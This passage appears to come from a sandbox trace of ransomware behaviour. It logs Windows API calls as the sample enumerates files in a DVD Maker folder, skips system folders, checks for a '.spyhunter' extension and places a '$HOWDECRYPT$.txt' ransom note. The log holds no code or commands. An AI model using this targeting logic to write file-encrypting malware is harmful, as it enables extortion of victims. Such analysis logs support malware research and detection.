lpFindFileData=0x298eca8) returned 1 [0092.557] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.558] lstrlenW (lpString="Windows") returned 7 [0092.558] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.558] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.558] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.558] lstrlenW (lpString="System Volume Information") returned 25 [0092.558] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png") returned 89 [0092.558] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.558] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.558] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.558] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png") returned 89 [0092.558] GetProcessHeap () returned 0x2c0000 [0092.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf4) returned 0x35a360 [0092.558] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c8) returned 0x2c310e0 [0092.558] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.558] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.558] lstrlenW (lpString="Windows") returned 7 [0092.558] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.558] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.558] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.558] lstrlenW (lpString="System Volume Information") returned 25 [0092.558] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png") returned 95 [0092.558] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.558] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.558] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.558] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png") returned 95 [0092.559] GetProcessHeap () returned 0x2c0000 [0092.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x100) returned 0x381988 [0092.559] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d0) returned 0x2c310e0 [0092.559] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.559] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.559] lstrlenW (lpString="Windows") returned 7 [0092.559] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.559] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.559] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.559] lstrlenW (lpString="System Volume Information") returned 25 [0092.559] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png") returned 90 [0092.559] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.559] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.559] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.559] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png") returned 90 [0092.559] GetProcessHeap () returned 0x2c0000 [0092.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf6) returned 0x35a460 [0092.559] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d8) returned 0x2c310e0 [0092.559] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.559] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.559] lstrlenW (lpString="Windows") returned 7 [0092.559] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.559] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.559] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.560] lstrlenW (lpString="System Volume Information") returned 25 [0092.560] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png") returned 96 [0092.560] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.560] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.560] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.560] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png") returned 96 [0092.560] GetProcessHeap () returned 0x2c0000 [0092.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x102) returned 0x37a750 [0092.560] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e0) returned 0x2c310e0 [0092.560] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.560] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.560] lstrlenW (lpString="Windows") returned 7 [0092.560] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.560] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.560] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.560] lstrlenW (lpString="System Volume Information") returned 25 [0092.560] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png") returned 87 [0092.560] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.560] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.560] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.560] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png") returned 87 [0092.560] GetProcessHeap () returned 0x2c0000 [0092.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf0) returned 0x355790 [0092.561] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e8) returned 0x2c310e0 [0092.561] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.561] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.561] lstrlenW (lpString="Windows") returned 7 [0092.561] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.561] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.561] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.561] lstrlenW (lpString="System Volume Information") returned 25 [0092.561] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png") returned 93 [0092.561] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.561] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.561] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.561] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png") returned 93 [0092.561] GetProcessHeap () returned 0x2c0000 [0092.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfc) returned 0x381a90 [0092.561] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f0) returned 0x2c310e0 [0092.561] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.561] lstrcmpiW (lpString1="title_stripe.png", lpString2="Windows") returned -1 [0092.561] lstrlenW (lpString="Windows") returned 7 [0092.562] lstrcmpiW (lpString1="title_stripe.png", lpString2="$Recycle.bin") returned 1 [0092.562] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.562] lstrcmpiW (lpString1="title_stripe.png", lpString2="System Volume Information") returned 1 [0092.562] lstrlenW (lpString="System Volume Information") returned 25 [0092.562] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png") returned 73 [0092.562] StrStrIW (lpFirst="title_stripe.png", lpSrch=".spyhunter") returned 0x0 [0092.562] lstrcmpW (lpString1="title_stripe.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.562] lstrcmpW (lpString1="title_stripe.png", lpString2="_uninstalling_.png") returned 1 [0092.562] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png") returned 73 [0092.562] GetProcessHeap () returned 0x2c0000 [0092.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x346568 [0092.562] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f8) returned 0x2c310e0 [0092.562] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0092.562] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0092.563] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\$HOWDECRYPT$.txt") returned 73 [0092.563] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\$HOWDECRYPT$.txt") returned 73 [0092.563] GetProcessHeap () returned 0x2c0000 [0092.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x346e28 [0092.563] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1600) returned 0x2c310e0 [0092.565] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.565] lstrcmpiW (lpString1="LayeredTitles", lpString2="Windows") returned -1 [0092.565] lstrlenW (lpString="Windows") returned 7 [0092.565] lstrcmpiW (lpString1="LayeredTitles", lpString2="$Recycle.bin") returned 1 [0092.565] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.565] lstrcmpiW (lpString1="LayeredTitles", lpString2="System Volume Information") returned -1 [0092.565] lstrlenW (lpString="System Volume Information") returned 25 [0092.565] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned 61 [0092.565] lstrcmpW (lpString1="LayeredTitles", lpString2=".") returned 1 [0092.565] lstrcmpW (lpString1="LayeredTitles", lpString2="..") returned 1 [0092.565] GetProcessHeap () returned 0x2c0000 [0092.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c11050 [0092.566] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\*") returned 63 [0092.566] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0092.569] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.569] lstrlenW (lpString="Windows") returned 7 [0092.569] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.569] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.569] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.569] lstrlenW (lpString="System Volume Information") returned 25 [0092.569] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\.") returned 63 [0092.569] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.569] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.569] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.569] lstrlenW (lpString="Windows") returned 7 [0092.569] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.569] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.569] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.570] lstrlenW (lpString="System Volume Information") returned 25 [0092.570] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\..") returned 64 [0092.570] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.570] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.570] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.570] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0092.570] lstrlenW (lpString="Windows") returned 7 [0092.570] lstrcmpiW (lpString1="1047x576black.png", lpString2="$Recycle.bin") returned 1 [0092.570] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.570] lstrcmpiW (lpString1="1047x576black.png", lpString2="System Volume Information") returned -1 [0092.570] lstrlenW (lpString="System Volume Information") returned 25 [0092.570] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png") returned 79 [0092.570] StrStrIW (lpFirst="1047x576black.png", lpSrch=".spyhunter") returned 0x0 [0092.570] lstrcmpW (lpString1="1047x576black.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.570] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0092.570] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png") returned 79 [0092.570] GetProcessHeap () returned 0x2c0000 [0092.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x3781c0 [0092.570] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1608) returned 0x2c310e0 [0092.570] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.570] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="Windows") returned -1 [0092.570] lstrlenW (lpString="Windows") returned 7 [0092.570] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="$Recycle.bin") returned 1 [0092.570] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.571] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="System Volume Information") returned -1 [0092.571] lstrlenW (lpString="System Volume Information") returned 25 [0092.571] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 81 [0092.571] StrStrIW (lpFirst="203x8subpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.571] lstrcmpW (lpString1="203x8subpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.571] lstrcmpW (lpString1="203x8subpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.571] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 81 [0092.571] GetProcessHeap () returned 0x2c0000 [0092.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f508 [0092.571] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1610) returned 0x2c310e0 [0092.571] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.571] lstrcmpiW (lpString1="blackbars60.png", lpString2="Windows") returned -1 [0092.571] lstrlenW (lpString="Windows") returned 7 [0092.571] lstrcmpiW (lpString1="blackbars60.png", lpString2="$Recycle.bin") returned 1 [0092.571] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.571] lstrcmpiW (lpString1="blackbars60.png", lpString2="System Volume Information") returned -1 [0092.571] lstrlenW (lpString="System Volume Information") returned 25 [0092.571] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png") returned 77 [0092.571] StrStrIW (lpFirst="blackbars60.png", lpSrch=".spyhunter") returned 0x0 [0092.571] lstrcmpW (lpString1="blackbars60.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.571] lstrcmpW (lpString1="blackbars60.png", lpString2="_uninstalling_.png") returned 1 [0092.571] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png") returned 77 [0092.571] GetProcessHeap () returned 0x2c0000 [0092.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3782a8 [0092.572] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1618) returned 0x2c310e0 [0092.572] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.572] lstrcmpiW (lpString1="layers.png", lpString2="Windows") returned -1 [0092.572] lstrlenW (lpString="Windows") returned 7 [0092.572] lstrcmpiW (lpString1="layers.png", lpString2="$Recycle.bin") returned 1 [0092.572] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.572] lstrcmpiW (lpString1="layers.png", lpString2="System Volume Information") returned -1 [0092.572] lstrlenW (lpString="System Volume Information") returned 25 [0092.572] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png") returned 72 [0092.572] StrStrIW (lpFirst="layers.png", lpSrch=".spyhunter") returned 0x0 [0092.572] lstrcmpW (lpString1="layers.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.572] lstrcmpW (lpString1="layers.png", lpString2="_uninstalling_.png") returned 1 [0092.572] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png") returned 72 [0092.572] GetProcessHeap () returned 0x2c0000 [0092.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x346f08 [0092.572] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1620) returned 0x2c310e0 [0092.572] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.572] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.573] lstrlenW (lpString="Windows") returned 7 [0092.573] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.573] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.573] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.573] lstrlenW (lpString="System Volume Information") returned 25 [0092.573] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png") returned 94 [0092.573] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.573] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.573] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.573] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png") returned 94 [0092.573] GetProcessHeap () returned 0x2c0000 [0092.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfe) returned 0x381b98 [0092.573] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1628) returned 0x2c310e0 [0092.573] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.573] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.573] lstrlenW (lpString="Windows") returned 7 [0092.573] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.573] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.573] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.573] lstrlenW (lpString="System Volume Information") returned 25 [0092.573] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png") returned 100 [0092.573] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.573] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.573] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.574] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png") returned 100 [0092.574] GetProcessHeap () returned 0x2c0000 [0092.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x10a) returned 0x375928 [0092.574] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1630) returned 0x2c310e0 [0092.574] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.574] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.574] lstrlenW (lpString="Windows") returned 7 [0092.574] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.574] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.574] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.574] lstrlenW (lpString="System Volume Information") returned 25 [0092.574] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png") returned 95 [0092.574] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.574] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.574] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.574] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png") returned 95 [0092.574] GetProcessHeap () returned 0x2c0000 [0092.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x100) returned 0x381ca0 [0092.574] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1638) returned 0x2c310e0 [0092.574] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.574] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.574] lstrlenW (lpString="Windows") returned 7 [0092.574] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.574] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.575] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.575] lstrlenW (lpString="System Volume Information") returned 25 [0092.575] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png") returned 101 [0092.575] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.575] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.575] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.575] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png") returned 101 [0092.575] GetProcessHeap () returned 0x2c0000 [0092.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x10c) returned 0x37b110 [0092.575] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1640) returned 0x2c310e0 [0092.575] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.575] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.575] lstrlenW (lpString="Windows") returned 7 [0092.575] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.575] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.575] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.575] lstrlenW (lpString="System Volume Information") returned 25 [0092.575] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png") returned 92 [0092.575] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.575] 